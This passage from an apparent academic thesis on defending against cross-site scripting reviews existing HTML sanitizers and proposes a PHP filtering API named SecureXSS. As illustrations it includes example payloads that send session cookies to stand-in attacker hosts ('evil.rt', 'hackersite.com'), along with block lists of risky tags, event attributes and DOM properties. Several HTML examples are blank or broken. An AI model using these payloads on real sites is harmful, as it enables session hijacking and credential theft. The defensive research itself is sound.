holding the attribute being checked and its contents will be removed entirely. This onInvalid
action is reserved for those attributes, which when removed, make the presence of the tag
meaningless. An example usage of this setting is displayed below.
Welcome, my name is var cke = document.cookie; var url= ‘http://evil.rt/cookie.cgi’+cke; document.location = url; and I’m 25 years old!
Above shown is the message posted by user. The result after failing to validate this code
is shown below.
Welcome, my name is and I’m 25 years old!
If an attribute with an onInvalid action set to filterTag fails validation, the start and end
tag of the node will be removed while the contents are promoted. This is exactly what happens in
the filter processing action. The process can be seen below.
Click on this!
Above shown is the message posted by user. The result after passing this message to
AntiSamy will be:
Click on this!
The default onInvalid action is removeAttribute. When this onInvalid action is set (or if
none is set) on an attribute that fails validation, the attribute itself is removed from the tag, but
the tag and its contents will remain. The process is shown below.
24
Above shown is the message posted by user. The result after passing this message to
AntiSamy will be:
The knowledge base for the filter’s engine is an XML file called antisamy.xml. The same
policy file can be used across multiple implementations (.Net, J2EE, etc.). The default policy file
was tailored to W3C’s HTML 4.0 and CSS 2.0 specifications. Thus any official attributes which
is dictated by the specifications can be used. If a user agent supports an attribute not specified, it
can be added to the policy file, though some effort has already been put in integrating those non-
standard attributes which are being used and honored in the wild.
To summarize, OWASP AntiSamy is an API implemented in Java and .Net to ensure
user-supplied HTML/CSS is in compliance within an application rules. It has very good XSS
cleaning abilities, so long as it removes things it doesn’t recognize. Architecturally speaking,
OWASP AntiSamy is highly dependent on policy files, which is a highly extended form of XML
Schema with information on what attributes and elements to allow. As such, the actual code for
filtering is relatively light-weight. Unfortunately, while XML Schema files can get a high level
of control on the validation, the regular expression heavy approach begins showing signs of
stress when data-types are complex (e.g. URIs).
3.2 The strip_tags()
The PHP function strip_tags() [STT] is the classic solution for attempting to clean up
HTML from unwanted tags (like or ). It is the worst solution of all to avoid
XSS because, the fact that it doesn't validate attributes at all (means that anyone can insert
malicious scripts in attributes like onmouseover='xss();' and exploit the application). While this
can be bandaided with a series of regular expressions that strip out on[event], striptags() is
fundamentally flawed and should not be used. Example of using strip_tags is illustrated below:
25
echo strip_tags($text, '
'); // Allow
and
?>
In the above example, strip_tags() strips all the tags except
and tags. By using
this malicious tags like , and can be stripped out, but we cannot validate
the values of attributes. To validate attributes of tags, we can write extra code at server side, but
the solution cannot be efficient and effective.
3.3 PHP Input Filter
PHP Input Filter [PIF] is the upgraded version of striptags(), with the ability to inspect
attributes. PHP Input Filter implements an HTML parser, and performs very basic checks on
whether or not tags and attributes have been defined in the whitelist (left upto user what he will
permit). Since it completely fails in checking the well-formedness, it is trivially easy to trick the
filter into leaving unclosed tags. Any user that allows the style attribute will be in great trouble as
we can't simply just let CSS through and expect layout not to be badly mutilated.
3.4 HTML_Safe/SafeHTML
HTML_Safe/SafeHTML [HTS] mechanism of action involves parsing HTML with a
SAX parser and performing validation and filtering as the handlers are called. strip_tags can only
strip tags. HTML_safe strips down all active content, including tags, attributes and values of
atrributes. This parser strips down all potentially dangerous content within HTML:
opening tag without its closing tag
closing tag without its opening tag
any of these tags: "base", "basefont", "head", "html", "body", "applet", "object",
"iframe", "frame", "frameset", "script", "layer", "ilayer", "embed", "bgsound", "link", "meta",
"style", "title", "blink", "xml" etc.
any of these attributes: on*, data*, dynsrc
javascript:/vbscript:/about: etc. protocols
26
expression/behavior etc. in styles
any other active content
It also tries to convert code to XHTML valid, but htmltidy is far better solution for this
task. HTML_Safe does a lot of things right, like blacklisting the list of dangerous attributes, But
by blacklisting tags (like style, applet, etc) for the reason that it have some dangerous attributes
will result in loss of functionality. Added to this it blocks all the occurrences of XSS by stripping
it off.
3.5 Kses
Kses [KSS] is an HTML/XHTML filter written in PHP. It removes all unwanted HTML
elements and attributes, and it also does several checks on attribute values (to avoid buffer
overflow attacks). Kses can be used to avoid XSS, as it will only allow the HTML elements and
attributes that it was explicitly told to allow. It will remove additional "" characters that
people may try to sneak in somewhere. The set of API’s that Kses allow its user to use are shown
below with explaination.
Table 3.1: Kses API’s
API Functionality
Parse($string = "") The basic function of kses. Give it a $string, and it will strip out
the unwanted HTML and attributes.
AddProtocols() Add a protocol or list of protocols to the kses object to be
considered valid during a Parse(). The parameter can be a string
containing a single protocol, or an array of strings, each
containing a single protocol.
Protocols() Deprecated. Use AddProtocols()
AddProtocol($protocol = "") Adds a single protocol to the kses object that will be considered
valid during a Parse().
27
SetProtocols() This is a straight setting/overwrite of existing protocols in the
kses object. All existing protocols are removed, and the
parameter is used to determine what protocol(s) the kses object
will consider valid. The parameter can be a string containing a
single protocol, or an array of strings, each constaining a single
protocol.
DumpProtocols() This returns an indexed array of the valid protocols contained in
the kses object.
DumpElements() This returns an associative array of the valid (X)HTML elements
in the kses object along with attributes for each element, and
tests that will be performed on each attribute.
AddHTML($tag = "", $attribs
= array())
This allows the end user to add a single (X)HTML element to
the kses object along with the (if any) attributes that the specific
(X)HTML element is allowed to have.
RemoveProtocol($protocol =
"")
This allows for the removal of a single protocol from the list of
valid protocols in the kses object.
RemoveProtocols() This allows for the single or batch removal of protocols from the
kses object. The parameter is either a string containing a
protocol to be removed, or an array of strings that each contain a
protocol.
filterKsesTextHook($string) For the OOP (Object Oriented Programming) version of kses,
this is an additional hook that allows the end user to perform
additional postprocessing of a string that's being run through
Parse().
_hook() Deprecated. Use filterKsesTextHook().
28
Configuring and usage of the Kses API’s are very simple and flexible, like user can set
the protocols that he want to allow or disallow, user can configure the API to add or remove the
element or attribute from the preconfigured Kses. Users are supposed to be very cautious in
using API’s, as different ways of using API’s results in different functionality. But Kses is not a
very good option as it has many loop holes which are exposed publicly by its users [GEL].
3.6 htmLawed
To say about htmLawed in its developers words, the highly-customizable htmLawed
[HTM, HTL] filter can be used to make text with HTML more secure, policy-compliant. It can
auto-correct and beautify HTML markup and restrict HTML elements (tags), attributes, and URL
protocols in the input. It also balances tags and checks for proper nesting of the HTML elements.
Furthermore, it can transform deprecated tags and attributes, check and convert character entities
(e.g., from hexadecimal to decimal type), obfuscate email addresses as an anti-spam measure,
etc. The set of features that htmLawed provides seems to be quite appreciable. But it just strips
of all the occurrences of script. It fails in validating and differentiating the simple script from
XSS.
At the other hand, web researches say [HTP]; htmLawed is modified version of Kses
(with some features added). It just strips of the script tag in order to avoid execution of script and
validation of attribute values is not so good (it allows inclusion of cgi/javascript/html files which
may lead to XSS).
3.7 Safe HTML Checker
Safe HTML Checker [SHC] is of same flavor as others, but which is well written piece of
code (strict in checking and parsing the tags). It is a white listing filter which filters all
occurrences of non found tags in the filter list. It is very strict in filtering all the occurrences of
script and CSS (Cascading Style Sheet). Safe HTML Checker is developed to satisfy the
requirements shown below.
1. Entered markup should be valid to XHTML strict, to stop comments form breaking
validation and keep things nice and tidy.
29
2. No presentational markup! They wanted web administrator to have complete control over
style sheets and comments posted should only be able to use structural HTML elements.
3. Attributes should be restricted to those that add semantic meaning. Javascript event
attributes and CSS related attributes should not be allowed.
4. Web Administrator should retain full control over the tags and attributes allowed in the
comments.
5. Submitted HTML must be kept free from anything that could pose a security risk, such as
javascript: URLs.
Just to satisfy these requirements, developer of Safe HTML Checker was not much
worried in the loss of functionality by his solution.
3.8 HTML Purifier
HTML Purifier [HTP] is a standards-compliant HTML filter library written in PHP.
Developers of HTML Purifier claim that it will remove all scripting code by auditing it
thoroughly, which is the loss of functionality provided. This is not less than all other existing
solutions in stripping off all the occurrences of script.
3.9 Summary
Regarding the available API/tool support, the present situation is not so (at all)
encouraging. Even the combination of all the approaches is not promising for web application
security; hardly any tools support the proper approach. Absence of holistic approach in
identifying the proper XSS attack is genuine matter of concern for web application security.
30
CHAPTER 4
PROBLEM STATEMENT
Simple script inserted in the message is very often misunderstood as XSS attack.
Scripting is a functionality provided for better ever experience. In existing solutions, any script
inserted is always assumed to be malicious and being stripped. For example, alert(“XSS”) is not
malicious because it does not harm the user. In contrast, alert(document.cookie) is malicious
because it is trying to access the browser DOM object (which is supposed to be secure). This
may lead to hijacking of the user session. As per security terms, one that harms a legitimate user
is an attack. Hence we claim that just inserting any script cannot be XSS attack.
Having understood the XSS attacks, another challenge that we identified to safe guard the
users from XSS attacks is whether to go with server side solution or client side solution. Client
side solution can help the users who are security conscious; who are familiar of XSS attacks and
the one who have some technical expertise (to use the solution we provide), such solution may
not help the novice users.
This project aims at developing holistic server side XSS API which differentiates the
XSS attack from simple script and strips it off. Thus novice users can enjoy the safe and better
experience of browsing without any surge of functionality, need of additional software or
configuration at browser side. Developing such API also reduces burden to web administrators to
safe guard their web applications from malignant XSS attacks.
31
CHAPTER 5
DIFFERENTIATING XSS FROM SIMPLE SCRIPTS
An analysis of available and widely used solutions for XSS is discussed in Chapter 3.
The point that existing solutions are missing out and giving scope for the new set of problem (s),
are discussed in Chapter 4. This Chapter will roam around the solution for the problem/challenge
identified.
As it is well known fact that XSS will occur because of some malicious script inserted
by an attacker in the web application, before we find what can be malicious script, we should
find the scope of an attacker to insert malicious script in the web application. Basically while
designing the Markup Languages, none of the tags and/or its attributes is meant for malicious
purpose. They are made for the genuine usage, but the attackers/hackers use these tags and /or its
attributes for their profits (basically for name or fame or robbing). By our observation, we found
a list of tags and/or its attributes which give scope for an attacker to insert malicious script, and
the same is shown in Table 5.1:
Table 5.1: Tags and its attributes which are in favour of attackers
Tag Attribute
form action
body background
applet code
object data
a, area, link href
iframe, frame, img longdesc
img onabort
32
a, area, button, input, label, select, textarea onblur
input, select, textarea onchange
a, abbr, acronym, address, area, tt, i, b, small, big, body, button,
caption, center, em, strong, dfn, code, samp, kbd, var, cite, col,
colgroup, dd, del, dir, div, dl, dt, fieldset, form, h1 - h14, input, ins,
label, legend, li, link, map, menu, noframes, noscript, ol, hr, img,
optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody
td, textarea, tfoot, th, thead, tr, u, ul
onclick, ondblclick,
onkeydown,
onkeypress, onkeyup,
onmousedown,
onmousemove,
onmouseout,
onmouseover,
onmouseup
h15 ondblclick
h15 - h16, onmousedown
h15 - h17, onmousemove
h15 - h18, onmouseout
h15 - h19, onmouseover
h15 - h20, onmouseup
h15 - h21, onkeydown
h15 - h22, onkeypress
h15 - h23, onkeyup
body, frameset onload
a, area, button, input, label, select, textarea onfocus
form onreset
33
input, textarea onselect
form onsubmit
body, frameset onunload
frame, iframe, img, input, script src
a, abbr, acronym, address, applet, area, tt, I, b, small, big,
basefont, bdo, blockquote, body, br, button, caption, center, em, strong,
dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt,
fieldset, font, form, frame, frameset, h1 - h11, hr, iframe, img, input, ins,
label, legend, li, link, map, menu, noframes, noscript, object, ol,
optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody,
td, textarea, tfoot, th, thead, tr, u, ul
style
Having understood that the above tags and/or its attributes give scope for an attacker to
insert some malicious script, it is extremely necessary to know, how they are accessible to an
attacker. The total set of attributes found vulnerable can be categorized into three types:
1. Set of attributes giving scope for content out of the actual page, such as href, src, etc,
through which a page/object with some malicious content can be included in the
existing page.
2. Set of attributes which allows user to write script directly, such as onload, onmouse,
onclick, etc, through which some malicious script can be included.
3. Set of attributes which allows user to do stylings for his content.
These three categories how they are different can be understood better with an example.
The first type is the set of attributes which include external object/content to the current/existing
page. To illustrate how these attributes can act malicious, we’ll take tag of image type.
For the tag of image type, some external image content will be fed using an attribute
34
called “SRC”, which displays the image in the existing page. But an attacker will insert some
malicious script instead of feeding the location of the image location. One such example is
shown below, which will alarm with the session cookie, every time the page is loaded. Just
alarming is exactly not malicious script, but since it is alarming with the user session cookie
which is supposed to be secure, it is considered to be malicious.
The set of attributes that belong to this category are: action, background, classid, code,
data, href, longdesc, src.
This type of attributes should be set to restrictions in allowing the external content based
on the tag and type of attribute. The allowed set of extensions for each of the tag and its
attributes are shown below:
Table 5.2: Extensions allowed
Tag Attribute Allowed Extensions
img, input
(type=image)
src, lowsrc,
dynsrc
.jpg, .jpeg, .png, .xbm, .gif, .bmp
a, area, link href .htm, .html, .asp, .jsp, .php, .aspx, .swf, .rb, .pl, .cgi
frame, iframe src .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp,
.php, .aspx
Any Tag longdesc .txt, .rtf, .doc
embed src .pdf, .doc, .wav
Any Tag background .jpg, .jpeg, .png, .xbm, .gif, .bmp
script src This attribute is not allowed
bgsound src .wav, .mid, .au
35
applet code .class
object classid .class, .py, .rb
object data .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp,
.php, .aspx, .flv, .mov, .wmv, .rm, .ra, .ram
The second type is the set of attributes which allows users to insert some script directly.
Allowing user to insert script directly is similar to leaving the bank open 24 Hrs, which makes
easy for thief to rob the bank. But in the way banks make its security system alert to protect their
customer’s wealth from thief, web administrator should make sure of the security system, to safe
guard the novice users. To understand how these type of attributes how it can be malicious, an
example is illustrated below, which will open a new window every time the page is loaded and
posts the novice user’s session cookie to attacker site through which session hijacking will be
done.
The set of attributes that belong to this category are: onblur, onclick, ondblclick, onfocus,
onmousedown, onmousemove, onmouseout, onmouseover, onmouseup, onkeydown, onkeypress,
onkeyup, onload, onunload, onabort, onblur, onchange, onreset, onselect, onsubmit.
The last and the third kind of attribute set will allow user to set the style for his content.
Examples explained for Type 1 and Type 2 categories of attributes are modified here to illustrate,
how third set of attributes can be used as vulnerable.
The only attribute that belongs to this category is style.
36
To save novice users from XSS, we should contemplate on four more tags apart from all
the attributes listed above, namely , , and tags. The tag
will be used by an attacker to insert some malicious script directly. The tag is generally
used to refer the defined path for the content in the page. This also can be used by an attacker to
edit the path of reference or redirect it to his site. In the way style attribute is used, similarly
tag will be used to insert malicious script. Such an example is shown below:
background-image: url(window.open(
http://hackersite.com/info.pl?captcha=document.cookie
In the above example, instead of giving the back ground image URL, a malicious script
is given, which on execution will open a new window and sends the user’s session cookie to
hacker’s site.
To save users from XSS kind of phishing attack which is explained in Section 2.6.3, we
should ponder upon inner text and action attribute of tag. Illustration of how
tag’s inner text will be used by an attacker is shown below:
User Name:
Password:
In the example shown above it creates the html form that displays two text boxes asking
username and password, on submit which posts the content to hacker’s site. If an attacker posts
this message in the banking website user forum, when an innocent user visits this page, he will
login and which may result in huge loss for the user. Since inner text of tag has such a
serious impact it is always better to strip off any content in tag. Apart from inner text of
tag, ‘action’ attribute also can be used by an attacker to hack the user’s username and
password. An attacker will post a message with tag and some malicious script which will
replace the actual tag with this inserted one. The result of such post is obvious that it
37
causes huge losses to innocent lame users. Hence ‘action’ attribute of tag also should be
removed from user posted message.
Having understood that the above tags and attributes allow an attacker to insert some
scripts to a web application and all the scripts that are inserted cannot be XSS, next step is to find
out what sort of scripts make the XSS possible.
As it is well known that, script that harms is an attack. In case of web applications, harm
that will occur to its users can be session hijacking, denial of service, phishing and altering the
page content. By hacking the user session cookies, attacker can hijack legitimate user session.
Denial of service can be done in many ways, like not allowing the user to visit the page he
wanted to visit by changing the page location or infinitely throwing alerts, etc. Phishing can be
done by creating/editing the forms on the web page.
As the problem is now narrowed down to certain possibilities, now it is not difficult for
someone to find out what sort of script (s) causes all such issues to a novice user. Our work on
finding out the malicious scripts resulted in restricting access to some set of DOM properties.
The Table 5.3 shows some DOM properties, which we should make sure that no attacker will
access it, in order to protect the legitimate user.
Table 5.3: DOM Properties which will cause XSS attacks
DOM Property Reason
Document.cookie This property will be used to steal the innocent user session.
Document.location, Location.href, Location.replace, Location.reload, Window.location, Window.location.reload(), Window.top.location, location.assign, window.self.location, document.reload
These DOM properties will be used to edit the document location and make a denial of service attack.
Window.history, history.forward, This DOM property will be used to access history of the
38
history.go, history.back browser window, keep showing the pages from history and not allowing user to access the page he wants to visit.
Document.write, document.writeln These properties will be used by an attacker to edit the page content.
Document.title This property will be used to change the title of the page
Window.status, window.defaultStatus
These properties will be used to change the status of the page and create panic to legitimate user.
Document.getElementById, document.getElementsByName, document.getElementsByTagName
These properties will be used to set the values of tag attributes in the page
Document.anchors, document.forms, document.frames, document.images, document.links, window.frames
These properties will be used to set the values to the corresponding tags in the page.
To save legitimate users from the hands of an attacker, we should find out all the
occurrences of any of the above shown properties, in the attributes shown in the Table 5.1 and
strip it off. Not only in the attributes shown in Table 5.1, but also in the inner text of tag
and tag.
If we can strip off all the malicious scripts at all the occurrences stated above
successfully, we can save the novice users from malignant XSS.
39
CHAPTER 6
IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS
As explained in Chapter 4, the solution that we come out with should not burden up the
lame user (user without any technology background) with extra configurations or installations at
browser end. At the same time he should enjoy the secure browsing with no surge in
functionality. Having understood all the challenges identified and solution proposed in Chapter
5, our goal is to implement a server side API, which should be fast, should not weigh down the
web server, makes minimal encumber to web developers/administrators.
This part of the thesis revolves around procedure of the solution, implementation details,
working of solution, results and finally comparison of our solution with other existing solutions
(with respect to time, not with respect to functionality)
6.1 Procedure
The abstract view of the solution explained in chapter 5 may not help the reader/user to
understand the solution. For the benefit of reader/user, core of the solution is presented here in
this section.
Algorithm 6.1 (High-level Algorithm explain procedure of SecureXSS)
Input: Input given by user (can be plain text or HTML or script)
Output: XSS free user input (Filtered user message)
1. Generate DOM for all the tags in the user given input.
2. Parse for all occurrences of script attributes (Type 2 kind of attributes explained in
Chapter 5).
3. Normalize value of each attribute, for each occurrence in step 2 and validate it.
4. Restrict the value of attribute for Type 1 kind of attributes as defined in Table 5.2.
40
5. Find all the occurrences of script tag, remove src attribute if set, normalize and
validate the inner text of script tag.
6. Find all the occurrences of style attribute, normalize and validate it.
7. Find all the occurrences of style tag and normalize the inner text and validate it.
8. Find all the occurrences of form tag remove action attribute if set and strip off the
inner text of form tag.
9. Remove the attributes which got failed in validation from step 3 through step 8.
10. Return the XSS free output.
6.2 Implementation Details
Having understood the solution in detail, from the procedure given above, in this section
we will present the implementation details of SecureXSS API. SecureXSS is the server-side XSS
filtering API, developed in PHP5. To generate DOM for the user given input, we are using
Simple HTML DOM Parser [HDP], which is an open source API, written in PHP.
The current version of SecureXSS is the model API developed in PHP5 to make web
developer’s job alleviate, which results in secure browsing for innocent users. This model is
developed to prove the correctness of the solution. Interested web developers can feel free to port
this solution to other server-side technologies (like asp, jsp, etc) that they are interested in.
As it is said above, in our implementation, we used Simple HTML DOM Parser (since
we felt it is working better compared to other DOM parsers) to parse and generate DOM for the
user input or given message. The current implementation of API restricts itself to Simple HTML
DOM Parser. The users who wish to use their own DOM parser or any other available DOM
parser, may have to rewrite the API for their usage. Once the DOM tree is generated for all tags
in the user given input, Step 2 to Step 9 in the above said procedure will be same.
41
6.3 Working of SecureXSS
SecureXSS is the server-side XSS filtering API, which validates and returns the non-
malicious user given input, on passing the malicious user input. The usage of SecureXSS API is
illustrated below in Figure 6.1. When user sends post request to web server, it instantiates the
API and forwards the user input to API. API validates and strips all the malicious content and
returns the non malicious content back to server, on which the user requested operation is
processed by web server.
Figure 6.1: Server-side XSS Filtering API
Steps shown above in Figure 6.1 are explained below:
1. Client sends post request to web server.
2. Web server sends request to SecureXSS API.
42
3. SecureXSS sends back the non-malicious user request.
4. Web server stores the user post in database (or) it processes the request in other case.
Here we will see working of the solution on the sample html shown below.
document.write("
43
6.4 Results
Security mechanisms cannot be comprehensively tested because it’s impossible to prove
a negative. Another way of saying that is, there is no way of knowing if the set of all publicly
known attacks, which can be incorporated into test cases, is equal to the set of all possible
attacks. A subset (200 vectors) of all publicly known XSS attacks gathered from recognized
knowledge bases [RSN] [W3S] have been tested with 100% effectiveness (shown in Appendix
II). Out of 200 vectors we collected, 100 are malicious and other 100 are non malicious (as
explained in Chapter 4).
Running time was also a very important consideration given the importance of
availability and response time for enterprise applications. In order to do the timing tests, we have
collected a set of 350 web pages from popular sites like http://news.yahoo.com/,
http://news.google.com/ and http://msdn.microsoft.com/. The results from our timing tests
(overhead) are shown in Table 6.1.
Table 6.1: SecureXSS timing test (overhead) results
Size of HTML (KB) Average Execution Time (Sec)
10-30 0.095048352
31-60 0.182305614
61-90 0.234215016
91-120 0.269700872
The results shown above are shown as graph in Figure 6.2, in which Size of HTML is
taken on X-axis and Execution time on Y-axis. Results shown above are taken on Intel Core 2
Duo 3.0 GHz system with 2GB RAM, running Windows XP Professional SP2, using XAMPP
web server.
44
Figure 6.2: SecureXSS overhead on the server
The results are also compared with another popular XSS API called HTML Purifier,
which is shown in Appendix III. As HTML Purifier is compared with all other solutions in
[HTP], we can say SecureXSS works very good compared all the existing server side XSS
filtering API’s.
Size of HTML – X-axis Execution Time – Y-axis
45
CHAPTER 7
CONCLUSIONS
Internet has revolutionized different aspects of human life, the way people communicate,
do business, etc. But the trust on these applications and the users experience is not fully
satisfactory due to plethora of security breaches which happen frequently in many critical
applications like banking, which leads to privacy threat of the legitimate customers’ details. So
this project will help in increasing the security of the web applications, hence enhancing the trust
on these applications by the end customers and providing a better experience online.
This project addresses the most important issue faced by current day web users, which is
Cross-site Scripting (XSS) attack. The important goal of this project was to build a server side
XSS filtering API which differentiates the simple script from malevolent XSS, besides which
execution time is also considered to be one of the factors. In the way, we worked on
differentiating simple XSS from XSS (as no existing server side XSS API’s are differentiating
simple script from XSS). We proposed an approach for differentiating simple script from XSS.
We also developed an open source server side XSS filtering model API called SecureXSS
(pronounce as Secure Excess), which differentiates simple script from malignant XSS.
Scope for Future Work
The developed model API works very fine in stripping out the genuine XSS (including
XSS worms and virus), but however it is restricted to PHP, as it is developed in PHP. The same
logic/work can be extended to all the other server side scripting languages (like asp, jsp, etc), so
that all classes of web developers can use the solution.
This Page is intentionally left blank
46
REFERENCES
[OWA] OWASP Top 10, The Ten Most Critical Web Application Security vulnerabilities, http://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf, Last Accessed: July 7, 2009.
[CER] Cert advisory ca-2000-02 malicious html tags embedded in client web requests., February 2000.
[XSS] Cross-site Scripting (XSS), www.owasp.org/index.php/Cross_site_scripting, Last Accessed: July 7, 2009.
[USC] US-CERT. eBay contains a cross-site scripting vulnerability. http://www.kb.cert.org/vuls/id/808921, 2006.
[KLE] Amit Klein. DOM Based Cross Site Scripting or XSS of the Third Kind. http://www.webappsec.org/projects/articles/071105.shtml, 2005.
[PEW] Pew Internet & American Life Project Report: Spam and Phishing. http://www.pewinternet.org, 2005.
[STA] Ed Stansel. Don’t Get Caught by Online Phishers Angling for Account information. Florida Times-Union, 1997.
[OLL] Gunter Ollmann. The Phishing Guide, Understanding & Preventing Phishing Attacks. NGSSoftware Insight Security Research, 2004.
[RRO] J.Martin, Justus Winter. RequestRodeo: Client Side Protection against Session Riding. In OWASPAppSec2006Europe, 2006.
[ROB] Robert Auger. The Cross-Site Request Forgery (CSRF/XSRF) FAQ. http://www.cgisecurity.com/csrf-faq.html. Apr, 2008.
[CSRF] Cross Site Request Forgery, An introduction to a common web application weakness. Jesse Burns 2007.
[JEG] Jeremiah Grossman, Robert “RSnake” Hansen, Petko “pdp” D. Petkov, Anton Rager, Seth Fogie, XSS Attacks Cross-site Scripting Exploits and Defence, Syngress Publishing, Inc., ISBN-13: 978-1-59749-154-9.
[BBC] BBCode, http://en.wikipedia.org/wiki/BBCode, Last Accessed: July 7, 2009.
[WIT] Wikitext, http://en.wikipedia.org/wiki/Wikitext, Last Accessed: July 7, 2009.
[MAD] Markdown, http://daringfireball.net/projects/markdown/, Last Accessed: July 7, 2009.
47
[TEX] Textile, http://textism.com/tools/textile/, Last Accessed: July 7, 2009.
[STT] Strip_tags – Manual, http://php.net/manual/en/function.strip-tags.php, Last Accessed: July 8, 2009.
[PIF] PHP Input Filter, www.phpclasses.org/browse/package/2189.html#download, Last Accessed: July 8, 2009.
[HTS] HTML_Safe, http://pear.php.net/package/HTML_Safe/, Last Accessed: July 8, 2009.
[KSS] Kses, http://sourceforge.net/projects/kses/, Last Accessed: July 8, 2009.
[HTL] htmLawed, www.bioinformatics.org/phplabware/internal_utilities/htmLawed/index.php, Last Accessed: July 8, 2009.
[SHC] Safe HTML Checker, http://simonwillison.net/2003/Feb/23/safeHtmlChecker/, Last Accessed: July 8, 2009.
[HTP] HTML Purifier, http://htmlpurifier.org/, Last Accessed: July 8, 2009.
[ANT] Dabirsiaghi, Arshan, Towards Automated Malicious Code Detection and Removal on the Web, Open Web Application Security Project, Aspect Security, Inc., 2007.
[GEL] Security issues in Kses - Geeklog, http://www.geeklog.net/article.php/kses, Last Accessed: July 16, 2009.
[HTM] htmLawed, http://drupal.org/project/htmLawed, Last Accessed:July 16, 2009.
[HDP] PHP Simple HTML DOM Parser, http://simplehtmldom.sourceforge.net/, Last Accessed: July 20, 2009.
[RSN] XSS (Cross-site Scripting) Cheat Sheet, http://ha.ckers.org/xss.html, Last Accessed: July 24, 2009.
[W3S] W3Schools, http://www.w3schools.com, Last Accessed: July 24, 2009.
This Page is intentionally left blank
48
APPENDIX I
OWASP THE TEN MOST CRITICAL WEB APPLICATION SECURITY VULNERABILITIES
The Open Web Application Security Project (OWASP) (www.owasp.org) is a worldwide
free and open community focused on improving the security of application software. OWASP’s
mission is to make application security visible, so that people and organizations can make
informed decisions about true application security risks.
The primary aim of the OWASP Top 10 is to educate developers, designers, architects
and organizations about the consequences of the most common web application security
vulnerabilities. This is based on the MITRE Vulnerability trends (explained in
http://cwe.mitre.org/documents/vuln-trends/index.html), from which the top ten vulnerabilities
are distilled. The following are the ranks of the vulnerabilities:
Figure 1: MITRE data on Top 10 web application vulnerabilities for 2006
[OWA] discusses each of the vulnerability in detail along with the protection measures
to be taken to protect the application from these vulnerabilities. However, it is considered that
49
the most common vulnerabilities like Unvalidated input, Buffer overflows, integer overflows and
format string issues, Denial of service and Insecure configuration management are taken care of
in the web applications. The following table provides a brief discussion about the top 10 web
application vulnerabilities listed in the OWASP Top 10 2007 [OWA].
Table 1: OWASP Top 10 Web Application Vulnerabilities
Vulnerability Description
A1 – Cross Site Scripting (XSS)
XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim’s browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
A2 – Injection Flaws
Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker’s hostile data tricks the interpreter into executing unintended commands or changing data.
A3 – Malicious File Execution
Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile